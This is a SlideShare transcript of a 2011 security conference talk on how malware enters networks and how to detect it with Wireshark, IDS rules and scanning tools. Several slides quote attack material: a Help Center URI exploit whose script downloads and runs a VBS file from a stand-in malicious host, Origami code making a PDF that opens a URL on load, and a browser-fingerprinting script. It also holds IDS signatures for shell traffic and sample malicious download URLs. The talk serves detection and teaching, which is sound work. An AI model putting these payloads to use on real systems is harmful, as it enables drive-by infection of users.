Taming worms, rats, dragons & more

1,533 views

Published on

Presentation around malware on your network and how to detect them with open-source tools. Presented during BlackHat Abu DHabi 2011

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,533
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
0
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Taming worms, rats, dragons & more

  1. 1. An Intel company ‘Taming Worms, RATs,Dragons,tjombies & More….’ By Christiaan Beek
  2. 2. Agenda An Intel company• whoami• The game has changed• How malware enters your network• What goes wrong• Wireshark Kung-Fu• Countermeasures• Resources & credits• Wrap upLEGO® is a trademark of the LEGO Group of companies which does not sponsor, authorize or endorse this presentation.
  3. 3. > whoami An Intel company• Christiaan Beek• Principal Architect• Foundstone EMEA IR & Forensics• Developer/Instructor MFIRE
  4. 4. The game has changed An Intel company MANU- MEDICAL FACTURING DEVICE ENERGY DATABASE SCADA MOBILE EMBEDDED RSA DuQu SILICON SMART CARS NIGHT DRAGON STUXNET SOCIAL AURORA ZEUS MEDIA ATM/KIOSK APPS ENTERTAINMENT VIRTUAL RF/IR WEB BLUETOOTH
  5. 5. The game has changed Total Malware Samples 70,000,000 60,000,000 50,000,000 40,000,000 30,000,000 20,000,000 10,000,000 0McAfee threat landscape Q2 report
  6. 6. The game has changed An Intel company
  7. 7. Some statistics An Intel companyThe Gulf region gains interest by malware authors:• Number of internet users growing• Windows XP most used OS• Vulnerable IE or PDF readers
  8. 8. Some statistics An Intel companyDid you know:• Internet Explorer 6 has more than 473 public known vulnerabilities• So…..
  9. 9. Some statistics An Intel company http://www.ie6countdown
  10. 10. Some statistics An Intel company Unpatched Windows XP + IE 6 =
  11. 11. Some statistics An Intel company Gulf region Malware spread vs GlobalSource: ThreatExpert & McAfee labs
  12. 12. Some statistics – Most detected malware An Intel company Iran Iraq: Lebanon: Jordan:Backdoor.Win32.Rbot Gen.Application Virus.Win32.Virut.ce Backdoor.TrojanMal/VBInject-D Mal/VB-G W32.Virut.CF Generic PWS.yP2P-Worm.Win32.Malas.h Malware.Virut W32/Scribble-B Infostealer.SnatchTrojan-PWS. PWS-RedNeck W32/Virut.n.gen Trojan-Win32.Sality. Trojan-Dropper Win32.SuspectCrc Downloader.Win32.VB.ttyWin32.Virut.Gen. Trojan- Trojan-Worm.P2P.Malas Spy.Win32.Agent.awkh Israel: PSW.Win32.FakeAIM.eWorm:Win32/Autorun.NI W32/Scribble-B Backdoor.Win32.IRCBot.hjd TSPY_FAKEAIM.E Trojan.FakeAlert VirTool.Win32.AttackerDow Oman W32/Koobface.worm.gen n.11Backdoor.Win32 Kuwait: W32/Sdbot.worm W32/Virut.n.genTrojan- Backdoor.Evilbot W32/Spybot.worm.genGameThief.Win32.Lmir P2P-Worm.Win32.SpyBot.gen Win32.Sality Syria:Trojan-Spy.Win32.Banker.gaa W32.Spybot.Worm Win32.Virut.Gen Worm.Akbot.Gen Trojan-Spy.Win32.BanbraVirus.Win32.Parite.b Worm.RBot.Gen.16 Virus.Win32.Alman.bVirus.Win32.Sality.r WORM_AUTORUN.XA United Arab Emirates Virus.Win32.Sality.lVirus.Win32.Virut.ce Saudi Arabia: Backdoor.Win32.VB.fhx Virus.Win32.VirutW32.Gammima.AG Backdoor.IRC.Bot HackTool.VB!sd6 W32/Autorun.wormW32.Spybot.Worm Malware.Harakit Trojan-Dropper.Agent W32/Sality-AI Malware.Virut Yemen TrojanDropper:Win32/VB.HE W32/Virut.n.gen PE_PARITE.ABackdoor.Win32.Cakl.a Trojan-PWS.Win32.VB WORM_AUTORUN.YN W32/Autorun.wormIRC Trojan TrojanSpy:Win32/Vwealer.CG W32/Mabezat Source: ThreatExpert &Mal/TinyDL-T Virus.Win32.Sality W32/Sality.gen McAfee labsTrojan.IRCBot Worm.IM.Sohanad W32/ZBotTrojan.Win32.Vilsel.sxw
  13. 13. Some statistics – Most detected malware An Intel company "The next slide contains scenes that some color-blind people may find disturbing"
  14. 14. Some statistics – Most detected malware An Intel company Iran Iraq: Lebanon: Jordan:Backdoor.Win32.Rbot Gen.Application Virus.Win32.Virut.ce Backdoor.TrojanMal/VBInject-D Mal/VB-G W32.Virut.CF Generic PWS.yP2P-Worm.Win32.Malas.h Malware.Virut W32/Scribble-B Infostealer.SnatchTrojan-PWS. PWS-RedNeck W32/Virut.n.gen Trojan-Win32.Sality. Trojan-Dropper Win32.SuspectCrc Downloader.Win32.VB.ttyWin32.Virut.Gen. Trojan- Trojan-Worm.P2P.Malas Spy.Win32.Agent.awkh Israel: PSW.Win32.FakeAIM.eWorm:Win32/Autorun.NI W32/Scribble-B Backdoor.Win32.IRCBot.hjd TSPY_FAKEAIM.E Trojan.FakeAlert VirTool.Win32.AttackerDow Oman W32/Koobface.worm.gen n.11Backdoor.Win32 Kuwait: W32/Sdbot.worm W32/Virut.n.genTrojan- Backdoor.Evilbot W32/Spybot.worm.genGameThief.Win32.Lmir P2P-Worm.Win32.SpyBot.gen Win32.Sality Syria:Trojan-Spy.Win32.Banker.gaa W32.Spybot.Worm Win32.Virut.Gen Worm.Akbot.Gen Trojan-Spy.Win32.BanbraVirus.Win32.Parite.b Worm.RBot.Gen.16 Virus.Win32.Alman.bVirus.Win32.Sality.r WORM_AUTORUN.XA United Arab Emirates Virus.Win32.Sality.lVirus.Win32.Virut.ce Saudi Arabia: Backdoor.Win32.VB.fhx Virus.Win32.VirutW32.Gammima.AG Backdoor.IRC.Bot HackTool.VB!sd6 W32/Autorun.wormW32.Spybot.Worm Malware.Harakit Trojan-Dropper.Agent W32/Sality-AI Malware.Virut Yemen TrojanDropper:Win32/VB.HE W32/Virut.n.gen PE_PARITE.ABackdoor.Win32.Cakl.a Trojan-PWS.Win32.VB WORM_AUTORUN.YN W32/Autorun.wormIRC Trojan TrojanSpy:Win32/Vwealer.CG W32/MabezatMal/TinyDL-T Virus.Win32.Sality W32/Sality.genTrojan.IRCBot Worm.IM.Sohanad W32/ZBotTrojan.Win32.Vilsel.sxw
  15. 15. What happened in Qatar? An Intel companySource: http://blogs.technet.com/b/security/archive/2011/11/22/the-curious-case-of-qatar.aspx
  16. 16. An Intel company
  17. 17. How malware enters your network An Intel companyHint: ‘ it is between the keyboard and the chair ’
  18. 18. How malware enters your network An Intel companyTop infection vectors:• Users browsing websites which have been infected with no outward sign of the compromise• Open attachments• Or:
  19. 19. How malware enters your network An Intel company User clicks on link
  20. 20. How malware enters your network An Intel company OR… User opens a PDF
  21. 21. How malware enters your network An Intel company With a little effort…… # Create a simple PDF document with Origami contents = ContentStream.new contents.write ‘Black Hat Sneak Peek, :x => 350, :y => 750, :rendering => Text::Rendering::STROKE, :size => 15 PDF.new.append_page(Page.new.setContents(contents)).save(‘Sneak peek.pdf) pdf = PDF.read(“Sneak peek.pdf") pdf.onDocumentOpen Action::URI.new(http://securitybananas.com) pdf.save(‘Sneak peek bhatpdf)
  22. 22. How malware enters your network An Intel company After x redirects: script executed: grab info
  23. 23. How malware enters your network An Intel company hcp://services/search?query=anything&topic=hcp:// system/sysinfo/sysinfomain.htm%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A..%5C..%5Csysinfomain.htm%u003fsvr=<script defer>eval(Run(String.fromCharCode(99,109,100,32,47 ,99,32,101,99,104,111,32,66,61,34,108,46,118,98,115,3 4,58,87,105,116,104,32,67,114,101,97,116,101,79,98,1 06,101,99,116,40,34,77,83,88,77,76,50,46,88,77,76,72, 84,84,80,34,41,58,46,111,112,101,110,
  24. 24. How malware enters your network An Intel company hcp://services/search?query=anything&topic=hcp://system/sysinf o/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%% A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A %%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A% %A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u0 03fsvr=<script defer>eval(Run(String.fromCharCode (cmd /c echo B="l.vbs":With CreateObject ("MSXML2.XMLHTTP") :.open "GET","http://malicioushostsite.com/content/hcp_vbs.php?f=16 6::60&d=0::0",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "" + B > %TEMP%l.vbs && %TEMP%l.vbs && taskkill /F /IM helpctr.exe)))
  25. 25. How malware enters your network An Intel company Info sent: Browser version Operating System Adobe version Flash version Java version Etc.
  26. 26. How malware enters your network An Intel company var jver = [0, 0, 0, 0], pdfver = [0, 0, 0, 0], flashver = [0, 0, 0, 0]; try {var PluginDetect = {handler : function (c, b, a){return function (){c(b, a)} [………….] initScript:function(){var c=this,a=navigator, e="/",i=a.userAgent| |"",g=a.vendor||"",b=a.platform||"",h=a.product||" ";c.OS=100;if(b){var f,d=["Win",1,"Mac",2,"Linux",3,"FreeBSD",4, "iPhone",21.1,"iPod",21.2, "iPad",21.3,"Win. * CE",22.1,"Win. * Mobile",22.2,"Pocket s * PC",22.3,"
  27. 27. How malware enters your network An Intel company Info gathered: Browser version Operating System Adobe version Flash version Java version Etc.
  28. 28. How malware enters your network An Intel company
  29. 29. How malware enters your network An Intel company C&C server
  30. 30. How malware traffic is hiding An Intel company ► Techniques used to hide traffic: • Disguising malicious traffic as web traffic • Shortened or encoded URLs • IRC over http
  31. 31. An Intel company► Techniques used to hide traffic:
  32. 32. What goes wrong? An Intel company
  33. 33. Problem #1 An Intel company ► many solutions but how to use them? ► education?
  34. 34. Problem #2 An Intel company ► No Malware strategy ► Focus on the end-point ► but what is your end-point nowadays?
  35. 35. Problem #3 An Intel company ► No layered (malware) defense ► Traffic streams unclear
  36. 36. Problem #4 An Intel company ► How does malware work? ► How to recognize patterns & correlate?
  37. 37. So.... An Intel company
  38. 38. Wireshark Kung-Fu An Intel company
  39. 39. Custom /targeted malware An Intel company ► Some recent samples of malware: • spreading: shares, USB-media, .exe infections • Search for Autocomplete information • Search for specific accounts • Keylogger • Created task to check if keylogger was running • Masked in dll files • Upload results to ftp servers
  40. 40. Custom /targeted malware An Intel company ► IEAutocomplete: Type: 89c39569 Subtype: 0xf111f3e Unknown: 89c39569: [IdentitiesPass]=[,,,,$#„#Œ] Type: e161255a Subtype: 0xe161255a IE AutoComplete: [address]=[Street ********* ,] IE AutoComplete: [ini_tmp]=[pa*******] IE AutoComplete: [name]=[p********] IE AutoComplete: [num]=[01*********] IE AutoComplete: [p0]=[******ADMIN] IE AutoComplete: [rech]=[SY*******] IE AutoComplete: [username]=[22*********]
  41. 41. Custom /targeted malware An Intel company ► As mentioned before, traffic is hidden using: • http(s) • ftp (traffic increase) • irc • Tcp 445 (traffic increase) • Tcp 53 (DNS) • Compression of traffic Used for downloading payload, uploading information, command & control
  42. 42. Custom /targeted malware An Intel company ► Arming for detection
  43. 43. Wireshark An Intel company Which filters can be used? First: tcp.dstport = =80 and http contains “GET” After analyzing this output fine-tuning filter: tcp.dstport == 80 and http contains "GET" and ip.dst_host == 67.2**.***.***
  44. 44. Wireshark An Intel company ►Which filters can be used? DNS queries: dns contains “ru” or dns contains “cn” or dns contains “biz” or dns contains “dyndns.org or dns contains cc”
  45. 45. T-shark An Intel company ►T-shark: command line:
  46. 46. Wireshark An Intel company ►Example of Morto:
  47. 47. Custom /targeted malware An Intel company ► Chinese Gh0st RAT • Full analysis by Foundstone’s Michael G.Spohn • example of Chinese RAT used in several campaigns • research project to understand working
  48. 48. Custom /targeted malware An Intel company ► Chinese Gh0st RAT
  49. 49. Custom /targeted malware An Intel company ► Network analysis of Chinese Gh0st RAT • Command & Control (C2) packets consists of: 1. A five byte packet header - contains the characters ‘Gh0st’. 2. A four byte integer that contains the size in bytes of the entire packet. 3. A four byte integer that contains the size in bytes of the entire packet when uncompressed. 4. A variable sized packet that contains the packet payload. The client sends small requests that contain commands, and the server responds to those commands with the requested data.
  50. 50. Custom /targeted malware An Intel company ► example of commands • 50 commands used
  51. 51. Custom /targeted malware An Intel company ► example of token codes • Used by server to identify payloads to client
  52. 52. Custom /targeted malware An Intel company ► example of login packet
  53. 53. Custom /targeted malware An Intel company ► uncompressing the login payload: First byte 66 (0x66 = 102)
  54. 54. Custom /targeted malware An Intel company ► lookup 102 in RAT’s command value table:
  55. 55. Custom /targeted malware An Intel company ► uncompressing the login payload: C0 A8 01 E0 = 192.168.1.249 (host ip-address)
  56. 56. Custom /targeted malware An Intel company ► uncompressing the login payload: ’01’ – in this case means a webcam is present on client
  57. 57. Custom /targeted malware An Intel company ► For the RE die-hards: Gh0st RAT LoginInfo structure
  58. 58. Wireshark filter An Intel company ► Chinese Gh0st RAT - filter: “x47x68x30x73x74” -Gh0st
  59. 59. Wireshark An Intel company ► NETBIOS traffic
  60. 60. Wireshark An Intel company ► Traffic regarding TCP 445 traffic (shares, smb) Incoming file share access attempts: ((smb.cmd && ip.dst > internal network address) || (smb.cmd && ip.dst < internal network broadcast address))
  61. 61. Wireshark An Intel company ►SMB worm creating .exe on share: smb.create.action == 2 and smb.file contains "exe"
  62. 62. Wireshark An Intel company ► SMB .exe detection: In old days: smb.file contains "exe"
  63. 63. Wireshark An Intel company ► SMB .exe detection: Taddong developed a tool to capture smb in Wireshark But… good news It’s now integrated in Wireshark Version 1.5.1 (Dev)
  64. 64. Wireshark An Intel company ► SMB .exe detection: File > Export > objects > SMB
  65. 65. Wireshark An Intel company ► SMB .exe detection:
  66. 66. Wireshark An Intel company DEMO
  67. 67. An Intel companyCOUNTERMEASURES
  68. 68. An Intel company Training &Education!!!!!
  69. 69. Countermeasures An Intel company
  70. 70. Countermeasures An Intel company ► Implement IDS rules to monitor/report RDP and VNC protocol use (particularly from the internet): RDP = "|43 6f 6f 6b 69 65 3a 20 6d 73 74 73 68 61 73 68|“ TPKT (RDP) = "|03 00 00 0b 06 e0|"; "|b8 e5 0d 3d 16 00|“ VNC = "|52 46 42 20 30 30 33 2e 30 30|"
  71. 71. Countermeasures An Intel company ► Implement IDS rules to monitor for CMD shell usage over the network from the internet or across firewalls: CMD = "|0a 0a|C|3a 5c|"; "|0a 0a|C|3a 5c|WINDOWS|5c|"; ► Implement new signatures in IDS/DLP as they are learned
  72. 72. Countermeasures An Intel company ► Detect services on non-standard ports ► Nmap the internal network: nmap -sS -p <ports> -oG results.nmap <IP or subnet range>
  73. 73. Countermeasures An Intel company ► Detect services on non-standard ports ► Probe discovered ports with Amap amap -A -b -o out.amap <IP> <port> <port> ... or use the results.nmap file as input
  74. 74. Countermeasures An Intel company ► Implement IDS/HIPS/DLP rules to detect outbound GET requests: Files by type (.exe, .bat, .dll etc.) in URL GET http://scan28.dosmokes.ce.ms/ InstallSystemDefender_133.bin HTTP/1.0 GET http://webmoviefiles.in/DownloaderThe.Queen.of.Fighters.450 94.exe HTTP/1.1
  75. 75. Countermeasures An Intel company ► Implement IDS/HIPS/DLP rules to detect Encoded URL extensions: GET http://220407db0435.thoseros.com/get2.php?c=PXWSQSZT&d=26606B67393230312E6 4636F317E3E3D2120222724243078747D456E7579232843471710111510015D404E166 E6F1F6C06740A00050701750C787B7A0504080876787777777377707C0C0C0E6A2F2 7212634206E656D637130303E66386B3F6E575003534204020A55584C041F1B0B1D4D 442D42522A021413444A4B4E4E4F4FB7B8B2B5A2F5F4E8EBB4CFF3FCE1E1FDF5E3 BCD6CCD0B0FBFCA8C5FEA1ADB8FCCCCFD6FCC1989 781DF9F9E969C8BCDC1D4 DD8FE6E7858686FCFBFB8DFE888D8AF5EFA3AEEAB6A9A9B1E7A9A4A1EBA7ABB1 A5B7EEE5E6E6E6EFEBEDEBEAE8F89AAFB3 HTTP/1.1
  76. 76. Countermeasures An Intel company ► Implement IDS/HIPS/DLP rules to detect MIME/Base64-encoded URL extensions GET http://65.75.156.141/Home/d.php?f=16&e=about.ex e HTTP/1.1 GET http://65.75.156.141/Home/d.php?f=MTYmZT1hYm 91dC5leGU== HTTP/1.1
  77. 77. Wrap up An Intel company ► What have you learned? • the game has changed • malware uses all kind of ways to hide it selves • Many tools to detect malware • but…. • invest in learning the tools and how malware works • define a defense-in-depth malware strategy • create awareness • educate administrators AND Management AND users
  78. 78. Resources & credits An Intel company ► Resources • Wireshark (http://www.wireshark.org) • Snort (http://www.sourcefire.com) • Nmap – (http://www.insecure.org) • Amap – (http://www.thc.org/thc-amap/) ► Special thanks to • Michael G. Spohn • Shane Shook • Tony Lee • Carric Dooley
  79. 79. Shukran/Thank you! An Intel company ► Keep in touch: • Christiaan_Beek @McAfee dot com ► Twitter: • @FSEMEA • @Foundstone • @ChristaanBeek

×